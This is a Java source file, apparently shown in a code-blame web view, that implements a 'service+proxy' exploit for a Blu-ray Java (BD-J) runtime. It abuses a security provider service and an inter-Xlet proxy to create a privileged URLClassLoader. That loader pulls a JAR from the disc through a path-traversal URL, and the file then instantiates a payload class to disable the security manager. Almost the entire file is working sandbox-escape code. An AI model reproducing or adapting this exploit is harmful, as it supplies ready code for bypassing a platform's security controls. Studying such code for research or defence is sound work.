2021-10-24 11:23:44 -04:00
|
|
|
/*
|
|
|
|
* Copyright (C) 2021 Andy Nguyen
|
|
|
|
*
|
|
|
|
* This software may be modified and distributed under the terms
|
|
|
|
* of the MIT license. See the LICENSE file for details.
|
|
|
|
*/
|
|
|
|
|
|
|
|
package com.bdjb;
|
|
|
|
|
|
|
|
import java.io.FileOutputStream;
|
|
|
|
import java.io.InputStream;
|
|
|
|
import java.io.OutputStream;
|
|
|
|
import java.net.URL;
|
|
|
|
import java.net.URLClassLoader;
|
|
|
|
import java.security.Provider;
|
2021-10-27 12:14:29 -04:00
|
|
|
import java.security.Security;
|
2021-10-24 11:23:44 -04:00
|
|
|
|
|
|
|
/** Implementation of the service+proxy exploit. */
|
|
|
|
class ExploitServiceProxyImpl implements ExploitInterface {
|
|
|
|
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
|
|
|
|
|
|
|
|
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
|
|
|
|
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
|
|
|
|
"(Ljava/lang/Object;)Ljava/lang/Object;";
|
|
|
|
|
|
|
|
private static final String JAR_URL =
|
|
|
|
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
|
|
|
|
|
|
|
|
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
|
|
|
|
|
|
|
|
public void trigger() throws Exception {
|
|
|
|
// Throw exception if class does not exist.
|
|
|
|
Class.forName(SERVICE_CLASS_NAME);
|
|
|
|
|
|
|
|
IxcProxyImpl proxy = IxcProxyImpl.getInstance();
|
|
|
|
|
|
|
|
// Prepare service object with the class to be instantiated.
|
|
|
|
Provider[] providers = Security.getProviders();
|
|
|
|
ServiceImpl service =
|
|
|
|
new ServiceImpl(
|
|
|
|
providers[0], "exploit", "exploit", URLClassLoader.class.getName(), null, null);
|
|
|
|
ProviderAccessorImpl providerAccessor = new ProviderAccessorImpl(providers);
|
|
|
|
providerAccessor.putService(providers[0], service);
|
|
|
|
providerAccessor.setProviderAccessor();
|
|
|
|
|
|
|
|
// Instantiate the URLClassLoader class with privileges and a vulnerable path.
|
|
|
|
URL[] urls = new URL[] {new URL(JAR_URL)};
|
|
|
|
URLClassLoader urlClassLoader =
|
|
|
|
(URLClassLoader)
|
|
|
|
proxy.invokeMethod(
|
|
|
|
service,
|
|
|
|
NEW_INSTANCE_METHOD_NAME,
|
|
|
|
NEW_INSTANCE_METHOD_SIGNATURE,
|
|
|
|
new Object[] {urls});
|
|
|
|
|
|
|
|
// Instantiate the payload class with all permissions to disable the security manager.
|
|
|
|
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
|
|
|
|
payloadClass.newInstance();
|
|
|
|
}
|
|
|
|
}
|